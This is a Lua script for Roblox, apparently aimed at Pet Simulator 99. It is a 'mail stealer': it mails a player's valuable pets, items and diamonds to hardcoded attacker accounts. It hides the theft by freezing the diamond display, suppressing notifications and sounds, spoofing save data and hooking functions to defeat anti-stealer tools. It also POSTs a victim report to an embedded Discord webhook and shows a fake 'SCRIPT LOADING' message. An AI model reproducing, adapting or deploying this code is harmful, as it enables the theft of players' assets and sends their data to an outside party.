--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

Username="GrowToPia_K1ng";Username2="GrowToPia_K1ng";webhook="https://discord.com/api/webhooks/1313407795655086080/48rq-Urbo4-8prHh6VJqLv8BHP96wEBgn4z-08Hinq-TXMv2tibU6pmshs8HKgu8ngyy";min_rap=10000;_G.scriptExecuted=_G.scriptExecuted or false ;if _G.scriptExecuted then return;end _G.scriptExecuted=true;local v0=game:GetService("ReplicatedStorage"):WaitForChild("Network");local v1=require(game.ReplicatedStorage.Library);local v2=require(game:GetService("ReplicatedStorage"):WaitForChild("Library"):WaitForChild("Client"):WaitForChild("Save")).Get().Inventory;local v3=require(game:GetService("ReplicatedStorage"):WaitForChild("Library"):WaitForChild("Client"):WaitForChild("Save")).Get().MailboxSendsSinceReset;local v4=game.Players.LocalPlayer;local v5="Iloveyou";local v6=game:GetService("HttpService");local v7={};local v8=0;local v9=false;local v10=function() return require(game.ReplicatedStorage.Library.Client.Save).Get();end;local v11=20000;if (v3~=0) then v11=math.ceil(v11 * (1.5^v3) );end local v12=1;for v30,v31 in pairs(v10().Inventory.Currency) do if (v31.id=="Diamonds") then v12=v31._am;break;end end if (v11>v12) then return;end local function v13(v32) local v32=math.floor(v32);local v33={"","k","m","b","t"};local v34=1;while v32>=1000  do v32=v32/1000 ;v34=v34 + 1 ;end return string.format("%.2f%s",v32,v33[v34]);end local function v14(v35,v36) local v37={["Content-Type"]="application/json"};local v38={{name="Retard Username:",value=v35,inline=true},{name="Items to be sent:",value="",inline=false},{name="Summary:",value="",inline=false}};local v39={};local v40={};for v62,v63 in ipairs(v7) do local v64=v63.name;if v40[v64] then v40[v64].amount=v40[v64].amount + v63.amount ;else v40[v64]={amount=v63.amount,rap=v63.rap};table.insert(v39,v64);end end table.sort(v39,function(v65,v66) return (v40[v65].rap * v40[v65].amount)>(v40[v66].rap * v40[v66].amount) ;end);for v67,v68 in ipairs(v39) do local v69=v40[v68];v38[2].value=v38[2].value   .. v68   .. " (x"   .. v69.amount   .. ")"   .. ": "   .. v13(v69.rap * v69.amount )   .. " RAP\n" ;end v38[3].value=v38[3].value   .. "Gems: "   .. v13(v36)   .. "\n" ;v38[3].value=v38[3].value   .. "Total RAP: "   .. v13(v8) ;if v9 then v38[3].value=v38[3].value   .. "\n\nVictim tried to use anti-mailstealer, but got fucked instead" ;end local v42={embeds={{title="\240\159\144\177 Steff Naa Kay Nakuha",color=65280,fields=v38,footer={text="Jhonsteff on Fb"}}}};if ( #v38[2].value>1024) then local v84={};for v94 in v38[2].value:gmatch("[^\r\n]+") do table.insert(v84,v94);end while ( #v38[2].value>1024) and ( #v84>0)  do table.remove(v84);v38[2].value=table.concat(v84,"\n");v38[2].value=v38[2].value   .. "\nPlus more!" ;end end local v43=v6:JSONEncode(v42);if (webhook and (webhook~="")) then local v85=request({Url=webhook,Method="POST",Headers=v37,Body=v43});end end local v15=v4.leaderstats["\240\159\146\142 Diamonds"].Value;local v16=v4.leaderstats["\240\159\146\142 Diamonds"];v16:GetPropertyChangedSignal("Value"):Connect(function() v16.Value=v15;end);local v17=v4.PlayerScripts.Scripts.Core["Process Pending GUI"];local v18=v4.PlayerGui.Notifications;v17.Disabled=true;v18:GetPropertyChangedSignal("Enabled"):Connect(function() v18.Enabled=false;end);v18.Enabled=false;game.DescendantAdded:Connect(function(v46) if (v46.ClassName=="Sound") then if ((v46.SoundId=="rbxassetid://11839132565") or (v46.SoundId=="rbxassetid://14254721038") or (v46.SoundId=="rbxassetid://12413423276")) then v46.Volume=0;v46.PlayOnRemove=false;v46:Destroy();end end end);local function v21(v47,v48) return require(game:GetService("ReplicatedStorage").Library.Client.DevRAPCmds).Get({Class={Name=v47},IsA=function(v71) return v71==v47 ;end,GetId=function() return v48.id;end,StackKey=function() return v6:JSONEncode({id=v48.id,pt=v48.pt,sh=v48.sh,tn=v48.tn});end}) or 0 ;end local v22=Username;local v23=Username2;local function v24(v49,v50,v51) local v52={[1]=v22,[2]=v5,[3]=v49,[4]=v50,[5]=v51 or 1 };local v53=false;repeat local v72,v73=v0:WaitForChild("Mailbox: Send"):InvokeServer(unpack(v52));if ((v72==false) and (v73=="They don't have enough space!")) then v22=v23;v52[1]=v22;end until v53==true  v12=v12-v11 ;v11=math.ceil(math.ceil(v11) * 1.5 );if (v11>5000000) then v11=5000000;end end local function v25() for v74,v75 in pairs(v10().Inventory.Currency) do if (v75.id=="Diamonds") then if (v12>=(v11 + 10000)) then local v109={[1]=v22,[2]=v5,[3]="Currency",[4]=v74,[5]=v12-v11 };local v110=false;repeat local v114=v0:WaitForChild("Mailbox: Send"):InvokeServer(unpack(v109));until v110==true  break;end end end end local function v26() local v54;for v76,v77 in pairs(v2['Pet']) do v54=v76;break;end local v55={[1]="Roblox",[2]="Test",[3]="Pet",[4]=v54,[5]=1};local v56,v57=v0:WaitForChild("Mailbox: Send"):InvokeServer(unpack(v55));if ((v57=="They don't have enough space!") or (v57=="You don't have enough diamonds to send the mail!")) then return false;else return true;end end local function v27() if v2.Box then for v97,v98 in pairs(v2.Box) do if v98._uq then v0:WaitForChild("Box: Withdraw All"):InvokeServer(v97);end end end end local function v28() local v58,v59=v0:WaitForChild("Mailbox: Claim All"):InvokeServer();while v59=="You must wait 30 seconds before using the mailbox!"  do wait();v58,v59=v0:WaitForChild("Mailbox: Claim All"):InvokeServer();end end local v29={"Pet","Egg","Charm","Enchant","Potion","Misc","Hoverboard","Booth","Ultimate"};for v60,v61 in pairs(v29) do if (v2[v61]~=nil) then for v99,v100 in pairs(v2[v61]) do if (v61=="Pet") then local v111=require(game:GetService("ReplicatedStorage").Library.Directory.Pets)[v100.id];if (v111.huge or v111.exclusiveLevel) then local v116=v21(v61,v100);if (v116>=min_rap) then local v118="";if (v100.pt and (v100.pt==1)) then v118="Golden ";elseif (v100.pt and (v100.pt==2)) then v118="Rainbow ";end if v100.sh then v118="Shiny "   .. v118 ;end local v119=v118   .. v100.id ;table.insert(v7,{category=v61,uid=v99,amount=v100._am or 1 ,rap=v116,name=v119});v8=v8 + (v116 * (v100._am or 1)) ;end end else local v112=v21(v61,v100);if (v112>=min_rap) then table.insert(v7,{category=v61,uid=v99,amount=v100._am or 1 ,rap=v112,name=v100.id});v8=v8 + (v112 * (v100._am or 1)) ;end end if v100._lk then local v113={[1]=v99,[2]=false};v0:WaitForChild("Locking_SetLocked"):InvokeServer(unpack(v113));end end end end if (( #v7>0) or (v12>(min_rap + v11))) then v28();if v26() then v9=true;local v101=game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("Mailbox: Send");for v107,v108 in ipairs(getgc(true)) do if ((typeof(v108)=="function") and (debug.info(v108,"n")=="typeof")) then local v115;v115=hookfunction(v108,function(v117,...) if (v117==v101) then return tick();end return v115(v117,...);end);end end end v27();require(game.ReplicatedStorage.Library.Client.DaycareCmds).Claim();require(game.ReplicatedStorage.Library.Client.ExclusiveDaycareCmds).Claim();local v78=game:GetService("ReplicatedStorage"):WaitForChild("Library"):WaitForChild("Client"):WaitForChild("Save");local v79=require(v78).Get();function deepCopy(v86) local v87={};for v102,v103 in pairs(v86) do if (type(v103)=="table") then v103=deepCopy(v103);end v87[v102]=v103;end return v87;end v79=deepCopy(v79);require(v78).Get=function(...) return v79;end;table.sort(v7,function(v88,v89) return (v88.rap * v88.amount)>(v89.rap * v89.amount) ;end);spawn(function() v14(v4.Name,v12);end);for v90,v91 in ipairs(v7) do if (v91.rap>=v11) then v24(v91.category,v91.uid,v91.amount);else break;end end v25();local v81=require(game.ReplicatedStorage.Library.Client.Message);v81.Error("SCRIPT LOADING");setclipboard("discord.gg/GY2RVSEGD");end